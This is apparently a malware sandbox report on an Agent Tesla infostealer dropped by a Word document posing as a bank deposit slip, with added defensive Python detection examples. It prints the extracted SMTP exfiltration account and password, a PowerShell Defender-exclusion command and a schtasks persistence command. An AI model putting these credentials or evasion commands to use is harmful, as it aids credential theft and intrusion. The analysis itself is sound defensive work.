Analysis

  • max time kernel
    143s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    14-03-2023 06:27

General

  • Target

    Bank Deposit Slip 230228.docx

  • Size

    10KB

  • MD5

    2105fbcf7af88cca80cbdae1768bd87a

  • SHA1

    4af4b2bdd5324d83c69cd31c12dd4efd0b14281d

  • SHA256

    36b207f1cf4470480efbaf303ce82a8214d1c40e3b991f6e3646c04fb0557138

  • SHA512

    adb9ebcabaa6a6b5a3fc0f44390e2bed1a47c7ea976baa3d9f192d1a38664fa70ad620f55a4859cfbf8a9d7e915c2144ff212db4d7d9a9ef5e75bebbcbb70c62

  • SSDEEP

    192:ScIMmtP1aIG/bslPL++uO5ebl+CVWBXJC0c3fJ:SPXU/slT+LOkbHkZC9x

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.palumalimited.com
  • Port:
    587
  • Username:
    novlove@palumalimited.com
  • Password:
    85h!UAfvL2AE
  • Email To:
    mullarred@gmail.com

Signatures

  • AgentTesla

    Agent Tesla is a .NET-based remote access tool (RAT) and information stealer, originally written in Visual Basic .NET. The credentials it harvests from browsers, mail and FTP clients are exfiltrated over the SMTP account listed under Malware Config above.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs

    The dropped payload is named vbc.exe, the name of the Visual Basic .NET compiler, but here it runs from C:\Users\Public rather than from a .NET Framework directory.
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). The signature text flags this as likely ransomware behaviour, but the rest of this report identifies an infostealer (Agent Tesla), for which drive enumeration is part of host discovery rather than encryption.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor (EQNEDT32.EXE) is an old Office component often targeted by exploits such as CVE-2017-11882. It is COM-activated (the -Embedding switch), so it appears at the top of the process tree below rather than as a child of WINWORD.EXE; detections that only look for children of Office processes miss this chain. In this run it makes a network request, loads a dropped DLL and spawns C:\Users\Public\vbc.exe. The report does not confirm which vulnerability was exploited.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs
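
The "Abuses OpenXML format to download file from external location" signature above corresponds to a relationship inside the .docx package whose TargetMode is External and whose type makes Word fetch the target (typically an attachedTemplate in word/_rels/settings.xml.rels). The following is an added example, not part of the sandbox report and not code from the sandbox vendor: it builds a constructed minimal .docx in memory with such a relationship (the URL is a placeholder on TEST-NET-3) and walks every .rels part to report external relationships, flagging the types that trigger an automatic fetch. Function names and the sample package are assumptions for illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that make Word fetch and load content from the target when
# the document opens. Hyperlinks are also External but only resolve on click,
# so they are reported but not flagged.
FETCHING_TYPES = {OFFICE_REL + "attachedTemplate", OFFICE_REL + "oleObject"}


def find_external_relationships(docx_bytes: bytes) -> list[dict]:
    """Walk every *.rels part in the package and return relationships with
    TargetMode="External", marking those whose type causes an automatic fetch."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for part in pkg.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(part))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "")
                findings.append({
                    "part": part,
                    "id": rel.get("Id"),
                    "type": rtype.rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                    "fetches": rtype in FETCHING_TYPES,
                })
    return findings


def is_remote_template_docx(docx_bytes: bytes) -> bool:
    """True when any external relationship is of a type Word fetches automatically."""
    return any(f["fetches"] for f in find_external_relationships(docx_bytes))


def build_sample_docx(template_url: str) -> bytes:
    """Constructed minimal package (not a real sample): settings.xml declares an
    attachedTemplate whose relationship points at an external URL."""
    def rels(body: str) -> str:
        return f'<Relationships xmlns="{PKG_REL_NS}">{body}</Relationships>'

    parts = {
        "[Content_Types].xml": (
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>'),
        "_rels/.rels": rels(
            f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/>'),
        "word/document.xml": (
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            '<w:body/></w:document>'),
        "word/_rels/document.xml.rels": rels(
            f'<Relationship Id="rId1" Type="{OFFICE_REL}settings" Target="settings.xml"/>'
            f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" Target="https://example.com/" TargetMode="External"/>'),
        "word/settings.xml": (
            '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
            '<w:attachedTemplate r:id="rId1"/></w:settings>'),
        "word/_rels/settings.xml.rels": rels(
            f'<Relationship Id="rId1" Type="{OFFICE_REL}attachedTemplate" '
            f'Target="{template_url}" TargetMode="External"/>'),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        for name, xml in parts.items():
            pkg.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://203.0.113.10/template.dotm")  # placeholder URL
    for finding in find_external_relationships(sample):
        print(finding)
    print("remote template:", is_remote_template_docx(sample))
```

Running this over a real submission only needs the file bytes; the check reads the package without invoking Office, so it is safe to run on untrusted input. Note that the document-level hyperlink is listed but not flagged, which keeps ordinary documents with web links from producing false positives.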

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Bank Deposit Slip 230228.docx"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:864
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:300
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Users\Public\vbc.exe
        "C:\Users\Public\vbc.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:856
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\zPpcDIHvTRqjgg.exe"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1556
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zPpcDIHvTRqjgg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1C19.tmp"
          3⤵
          • Creates scheduled task(s)
          PID:1808
        • C:\Users\Public\vbc.exe
          "C:\Users\Public\vbc.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:1576
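
The process tree above contains several relationships worth alerting on independently of the malware family: Equation Editor spawning a child, a binary executing from C:\Users\Public, PowerShell adding a Defender exclusion, schtasks creating a task from an XML file in Temp, and vbc.exe launching a second copy of itself (consistent with the SetThreadContext signature, the usual pattern for process hollowing). The following is an added example, not from the sandbox report: it encodes those relationships as rules and runs them over process events constructed from the list above. The parent of EQNEDT32.EXE is not shown in the report (it is COM-activated), so it is modelled as None; the rule names and data structure are assumptions for illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: Optional[int]   # None where the report gives no parent
    image: str
    cmdline: str


# Constructed from the report's Processes section (PIDs and command lines as listed there).
EVENTS = [
    ProcEvent(864, None, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Bank Deposit Slip 230228.docx"'),
    ProcEvent(300, 864, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcEvent(1568, None, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    ProcEvent(856, 1568, r"C:\Users\Public\vbc.exe", r'"C:\Users\Public\vbc.exe"'),
    ProcEvent(1556, 856, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\zPpcDIHvTRqjgg.exe"'),
    ProcEvent(1808, 856, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zPpcDIHvTRqjgg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1C19.tmp"'),
    ProcEvent(1576, 856, r"C:\Users\Public\vbc.exe", r'"C:\Users\Public\vbc.exe"'),
]

# schtasks /Create ... /XML <path containing \Temp\>
SCHTASKS_XML_IN_TEMP = re.compile(r'/xml\s+"?[^"]*\\temp\\')


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, reason) pairs for every rule each event trips."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid) if e.ppid is not None else None
        name = basename(e.image)
        parent_name = basename(parent.image) if parent else None
        cl = e.cmdline.lower()

        # Equation Editor has no business launching anything.
        if parent_name == "eqnedt32.exe":
            findings.append((e.pid, "child of Equation Editor"))
        # World-writable, rarely legitimate as an execution path.
        if e.image.lower().startswith("c:\\users\\public\\"):
            findings.append((e.pid, "executes from C:\\Users\\Public"))
        # Defense evasion: carving an exclusion for the payload's persistence path.
        if name == "powershell.exe" and "add-mppreference" in cl and "-exclusionpath" in cl:
            findings.append((e.pid, "adds Defender exclusion"))
        # Persistence: task definition staged in Temp rather than authored interactively.
        if name == "schtasks.exe" and "/create" in cl and SCHTASKS_XML_IN_TEMP.search(cl):
            findings.append((e.pid, "creates scheduled task from XML in Temp"))
        # A process starting a second instance of its own image, typical of hollowing
        # (the report pairs this with Suspicious use of SetThreadContext on PID 856).
        if parent is not None and parent_name == name:
            findings.append((e.pid, "spawns copy of own image (hollowing candidate)"))
    return findings


def flagged_pids(events: list[ProcEvent]) -> set[int]:
    return {pid for pid, _ in triage(events)}


if __name__ == "__main__":
    for pid, reason in triage(EVENTS):
        print(f"PID {pid}: {reason}")
```

WINWORD.EXE and its splwow64.exe child trip nothing, which is the point of keying on the relationships rather than on the Office process: the chain from EQNEDT32.EXE downward is what distinguishes this run from a user printing a document.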

    Network

    MITRE ATT&CK Matrix (ATT&CK v6)

    • Execution: Scripting (T1064) 1; Scheduled Task (T1053) 1; Exploitation for Client Execution (T1203) 1
    • Persistence: Registry Run Keys / Startup Folder (T1060) 1; Scheduled Task (T1053) 1
    • Privilege Escalation: Scheduled Task (T1053) 1
    • Defense Evasion: Scripting (T1064) 1; Modify Registry (T1112) 2
    • Credential Access: Credentials in Files (T1081) 3
    • Discovery: System Information Discovery (T1082) 1
    • Collection: Data from Local System (T1005) 3; Email Collection (T1114) 1

    The number after each technique is the count of matched signatures mapped to it. Technique IDs follow ATT&CK v6; several have since been deprecated or moved under sub-techniques in current ATT&CK (for example T1064 Scripting, T1060 Registry Run Keys / Startup Folder and T1081 Credentials in Files), so map them before importing into a tool that expects current IDs.


    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
      Filesize

      128KB

      MD5

      2d975bb768ff7bdaeb72d09c330a0bc6

      SHA1

      8713a5dd17ac40cda515388c123807fccd7b7c5e

      SHA256

      e9e373777f494acce91b9064d66955977d128b522ffd92cfada8f12cc06cf826

      SHA512

      7179d633b7d3e2c5a4e165c9183a11653a4bdecc669cc94756c6f30cf29a54e61803c6057dc2e0e430e846aa03f795468e1803f915e403179f4712c1adc69077

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0A3F849B-4A5F-499B-91FA-82D3BA9F4308}.FSD
      Filesize

      128KB

      MD5

      8213d02595bef055af68874108838487

      SHA1

      36d5d025ba2ec438d55fb64d7faa0433e104d9c7

      SHA256

      c1d9d31e40e056c66ecaf1445f28133e0561cb609ec302c002ee0adcb1ebc4dc

      SHA512

      95daeadf8127550cc03d899a0a97c2ff4f557db2391b2321ce4893b4bf7e8e96617adf4f72fc4bc4c50c8ab8b8e5dda407b70015c2976005568d8e28628e83f4

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UOYUJSME\73...................73[1].doc
      Filesize

      9KB

      MD5

      43310cefffed429d066f31a3cf342465

      SHA1

      f21af8d20f4abcacdcebbaa67035087f13400340

      SHA256

      1a02fb05dd2188052c7a68068bb776abcc2cf83f0dbbc53420a5a81518357656

      SHA512

      2c6a721fda47e194a6c410397c0a6080133d4127fa181bdabd62aab66fc473072be60b07834873cc2e100024d734bb9d1e9fad2a02824a99f10ccaddd52d7b1c

    • C:\Users\Admin\AppData\Local\Temp\tmp1C19.tmp
      Filesize

      1KB

      MD5

      4e10c816237df549e67a63219a9d18fe

      SHA1

      534d2e6ca282a945c004861888c57b2bf0fbc2f5

      SHA256

      830e87b3a717c175db47461a364b3ac1186d0ea6071e9b149f5fbb15c9c22666

      SHA512

      646a8798a177dc435e8bff99c368d5f2ae28927f60352947cae59ae62fdf9e06088360e0479fa952c9a93e02dae0d250541da520e5aab8e327a987b86bfa41a7

    • C:\Users\Admin\AppData\Local\Temp\{AC9845F2-DDED-4FCF-A945-9C7C6B13E117}
      Filesize

      128KB

      MD5

      819d9d7d4c8d634e8281e2512bf9fa84

      SHA1

      13fa7991eafd11b2e03e0ebfc58a343da7ab1576

      SHA256

      8c66518996b86a90e895ab687cc9ec238401b6cb4c54c6eac822971d0819e3fb

      SHA512

      257093a71feefee56385cf7d459b39b75174bc4c532aec1523cc90e49b5d161721f39a1938f635226db2138036e18955d4b3c84e52696c9687dcfea30a4190f5

    • C:\Users\Public\vbc.exe
      Filesize

      905KB

      MD5

      1131c3ff98d366b53bfb4a000b86e4ad

      SHA1

      f1705dfafa7e907099c003c1dd23d649c4d8c8f2

      SHA256

      450634194fe519cb252957dbdcd93497ca66c3a52cbd16c07860b1a39ee54a70

      SHA512

      5ce9fda5c0081bec22379a256e4a5d786dcb8fd3d638ee8ba1aeee8fe66eb563c8f3ccbae9f5d8fd0aa5306864fba51c2c8859abe0fa82b9aad47dd6b8ba20b2

    • \Users\Public\vbc.exe
      Filesize

      905KB

      MD5

      1131c3ff98d366b53bfb4a000b86e4ad

      SHA1

      f1705dfafa7e907099c003c1dd23d649c4d8c8f2

      SHA256

      450634194fe519cb252957dbdcd93497ca66c3a52cbd16c07860b1a39ee54a70

      SHA512

      5ce9fda5c0081bec22379a256e4a5d786dcb8fd3d638ee8ba1aeee8fe66eb563c8f3ccbae9f5d8fd0aa5306864fba51c2c8859abe0fa82b9aad47dd6b8ba20b2

    • memory/856-152-0x0000000005750000-0x0000000005806000-memory.dmp
      Filesize

      728KB

    • memory/856-143-0x00000000009A0000-0x00000000009BA000-memory.dmp
      Filesize

      104KB

    • memory/856-150-0x0000000000F90000-0x0000000000FD0000-memory.dmp
      Filesize

      256KB

    • memory/856-151-0x0000000000590000-0x000000000059C000-memory.dmp
      Filesize

      48KB

    • memory/856-142-0x0000000000F90000-0x0000000000FD0000-memory.dmp
      Filesize

      256KB

    • memory/856-160-0x0000000000F60000-0x0000000000F66000-memory.dmp
      Filesize

      24KB

    • memory/856-161-0x0000000004570000-0x00000000045B0000-memory.dmp
      Filesize

      256KB

    • memory/856-141-0x0000000001020000-0x0000000001108000-memory.dmp
      Filesize

      928KB

    • memory/864-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1556-175-0x00000000028E0000-0x0000000002920000-memory.dmp
      Filesize

      256KB

    • memory/1556-174-0x00000000028E0000-0x0000000002920000-memory.dmp
      Filesize

      256KB

    • memory/1576-166-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
      Filesize

      4KB

    • memory/1576-165-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/1576-167-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/1576-164-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/1576-170-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/1576-172-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/1576-173-0x0000000004D80000-0x0000000004DC0000-memory.dmp
      Filesize

      256KB

    • memory/1576-163-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/1576-162-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

    • memory/1576-177-0x0000000004D80000-0x0000000004DC0000-memory.dmp
      Filesize

      256KB